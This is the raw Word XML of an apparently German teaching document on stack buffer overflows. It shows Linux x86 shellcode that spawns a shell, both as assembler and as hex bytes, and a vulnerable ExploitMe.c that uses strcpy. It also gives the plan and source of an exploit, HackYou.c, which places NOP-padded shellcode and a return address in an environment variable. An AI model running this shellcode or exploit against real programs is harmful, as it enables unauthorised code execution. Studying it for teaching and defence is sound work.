                            <w:r>
                              <w:t>Code zum Öffnen einer She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1" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:242.25pt;margin-top:19.5pt;width:2in;height:27.0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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26">
                      <w:r>
                        <w:t>Code zum Öffnen einer Shell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berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc339281412"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack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betrachten</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:r>
        <w:object w:dxaOrig="8012" w:dyaOrig="9544">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:356.05pt;height:423.3pt" o:ole="">
            <v:imagedata r:id="rId17" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1413023289" r:id="rId18"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc339281413"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Assembler </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Equivalent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:proofErr w:type="spellEnd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B67719" wp14:editId="1403A4B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>157606</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3200400" cy="5140199"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="12" name="Textfel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51401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data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asciz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1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2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outine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Null2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Exit Routine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Exit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2" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:12.4pt;width:252pt;height:404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data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asciz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1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2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outine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ddrToBash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Null2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Exit Routine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Exit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985FDC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc339281414"/>
      <w:r>
        <w:t xml:space="preserve">Probleme mit diesem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00985FDC" w:rsidRDefault="00985FDC" w:rsidP="00985FDC"/>
    <w:p w:rsidR="00985FDC" w:rsidRDefault="00985FDC" w:rsidP="00985FDC">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Der </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> beinhaltet NULL=‘0‘, diese können nicht in ein </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>character</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> eingefügt werden, da sie dort das Ende des Strings bedeuten würde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 w:rsidRPr="00985FDC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NULL Anweisungen entfernen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00985FDC" w:rsidRPr="00985FDC" w:rsidRDefault="00985FDC" w:rsidP="00985FDC">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00985FDC">
        <w:t>Nutzung von fest programmierten Adressen, dadurch funktioniert es nicht auf allen Rechner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>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Relative Adressen verwenden</w:t>
      </w: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sectPr w:rsidR="00985FDC">
          <w:headerReference w:type="default" r:id="rId19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985FDC" w:rsidRDefault="00985FDC" w:rsidP="00985FDC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc339281415"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Benutzbaren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode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erstellen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9"/>
    <w:p w:rsidR="00660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9">
      <w:r>
        <w:object w:dxaOrig="10655" w:dyaOrig="7326">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:532.5pt;height:366.35pt" o:ole="">
            <v:imagedata r:id="rId20" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1413023290" r:id="rId21"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9">
      <w:pPr>
        <w:sectPr w:rsidR="00660EE9" w:rsidSect="00985FD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660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9">
      <w:pPr>
        <w:pStyle w:val="berschrift4"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nach der Modifizierung</w:t>
      </w:r>
    </w:p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1DD080" wp14:editId="2DD4A4DA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>287201</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4686300" cy="4459424"/>
                <wp:effectExtent l="0" t="0" r="19050" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="13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445942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jm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pop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xor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%al, 0x9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$11, %al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call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ShellVariables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.</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>ascii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ABBBBCCCC</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>"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3" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:17.75pt;margin-top:22.6pt;width:369pt;height:351.1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jmp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yCallStatemen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pop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xor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%al, 0x9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$11, %al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yCallStatemen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call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ShellVariables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.</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>ascii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ABBBBCCCC</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r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>Als Assembler Code</w:t>
      </w:r>
    </w:p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0EBD23F" wp14:editId="61ED9027">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>254167</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4686300" cy="2743668"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="14" name="Textfeld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274366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eb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x18\x5e\x31\xc0\x88\x46\x09\x89\x76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9\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e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d\x56\x0e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\xe8\xe3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2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42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42\x43\x43\x43\x43"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ret+2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4" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:17.75pt;margin-top:20pt;width:369pt;height:216.0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eb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x18\x5e\x31\xc0\x88\x46\x09\x89\x76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9\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e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d\x56\x0e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\xe8\xe3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2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42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42\x43\x43\x43\x43"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ret+2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 xml:space="preserve">Als C Code </w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Default="00660EE9" w:rsidP="00660EE9"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="00660EE9" w:rsidP="004D1933">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8039"/>
          <w:tab w:val="left" w:pos="8165"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc339281416"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> des Programms </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExploitMe.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Programmcode in C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933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06171</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1946080" cy="2054099"/>
                <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="15" name="Textfeld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0540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ring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*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0]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strcpy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[1])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1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5" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.35pt;width:153.25pt;height:161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4D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933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ring.h</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>&gt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*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)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{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0]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strcpy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[1])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1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4D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRPr="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRPr="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRPr="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc339281417"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> von </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExploitMe.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:r>
        <w:object w:dxaOrig="10579" w:dyaOrig="3615">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:453.35pt;height:155.1pt" o:ole="">
            <v:imagedata r:id="rId22" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1029" DrawAspect="Content" ObjectID="_1413023291" r:id="rId23"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRPr="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:sectPr w:rsidR="004D1933" w:rsidSect="00660EE9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4D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc339281418"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wie können wir das ausnutzen(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:sectPr w:rsidR="004D1933" w:rsidSect="004D1933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  <w:r>
        <w:object w:dxaOrig="12146" w:dyaOrig="8001">
          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:607.65pt;height:400.35pt" o:ole="">
            <v:imagedata r:id="rId24" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1030" DrawAspect="Content" ObjectID="_1413023292" r:id="rId25"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc339281419"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Konzept von </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackYou.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933"/>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> erstellen, welcher als Umgebungsvariable gesetzt wird</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1933" w:rsidRDefault="004D1933" w:rsidP="004D1933">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variable benennen </w:t>
      </w:r>
      <w:r w:rsidR="007360E7">
        <w:t>z.B. „EGG“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007360E7" w:rsidRDefault="007360E7" w:rsidP="004D1933">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>EGG beinhaltet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Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (24Byte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Padding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (60 Byte) – Aufgefüllt mit 0x90 (NOP Befehl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Ptr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auf den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (4 Byte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r>
        <w:t>NULL (4 Byte)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007360E7" w:rsidRDefault="007360E7" w:rsidP="007360E7">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Herrausforderung</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – Die Position des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> im Prozessspeicher finden und Zeiger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ptr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auf ihn zeigen lassen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="007360E7" w:rsidP="007360E7">
      <w:r>
        <w:object w:dxaOrig="10129" w:dyaOrig="2759">
          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:453.35pt;height:123.45pt" o:ole="">
            <v:imagedata r:id="rId26" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1031" DrawAspect="Content" ObjectID="_1413023293" r:id="rId27"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc339281420"/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8EDC8B5" wp14:editId="5539D0A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>612566</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5372100" cy="4119036"/>
                <wp:effectExtent l="0" t="0" r="19050" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="Textfeld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2100" cy="411903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ring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//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ipped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from</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> http://www.milw0rm.com/shellcode/444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=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31\xc0"                      // </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xorl</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">    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50"                          // </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>pushl</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">   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68\x6e\x2f\x73\x68"          // </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>pushl</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">    $0x68732f6e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68\x2f\x2f\x62\x69"          // </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>pushl</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">    $0x69622f2f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89\xe3"                      //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    %</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>esp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>,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99"                          // </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>cltd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52"                          // </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>pushl</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">   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53"                          // </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>pushl</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">   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89\xe1"                      //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    %</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>esp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>,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"\xb0\x0b"                      //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    $0xb</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>,%</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>al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"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 xml:space="preserve">\x80"                      //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     $0x80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etaddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>[] = "\xf8\xd6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define</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> NOP 0x90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9" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:48.25pt;width:423pt;height:324.3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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0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ring.h</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>&gt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//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ipped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from</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> http://www.milw0rm.com/shellcode/444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=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31\xc0"                      // </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xorl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">    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50"                          // </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>pushl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">   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68\x6e\x2f\x73\x68"          // </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>pushl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">    $0x68732f6e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68\x2f\x2f\x62\x69"          // </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>pushl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">    $0x69622f2f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89\xe3"                      //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    %</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>esp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>,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99"                          // </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>cltd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52"                          // </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>pushl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">   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53"                          // </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>pushl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">   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89\xe1"                      //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    %</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>esp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>,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"\xb0\x0b"                      //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    $0xb</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>,%</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>al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"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 xml:space="preserve">\x80"                      //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     $0x80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etaddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>[] = "\xf8\xd6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"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define</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> NOP 0x90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</w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quellcode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackYou.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0">
      <w:r>
        <w:rPr>
          <w:noProof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15088</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5261101" cy="3313911"/>
                <wp:effectExtent l="0" t="0" r="15875" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="20" name="Textfeld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61101" cy="331391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07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0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96]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emset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, NOP, 96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, "EGG=", 4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 xml:space="preserve">(buffer+4,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, 24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 xml:space="preserve">(buffer+88, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>retaddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>, 4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>(buffer+92, "\x00\x00\x00\x00", 4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putenv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system</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>("/bin/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>sh</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>")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0;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0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0" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:9.05pt;width:414.25pt;height:260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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0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{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96]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emset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, NOP, 96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, "EGG=", 4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 xml:space="preserve">(buffer+4,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, 24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 xml:space="preserve">(buffer+88, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>retaddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>, 4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>(buffer+92, "\x00\x00\x00\x00", 4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putenv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system</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>("/bin/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>sh</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>")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0;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0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BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0"/>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0"/>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0"/>
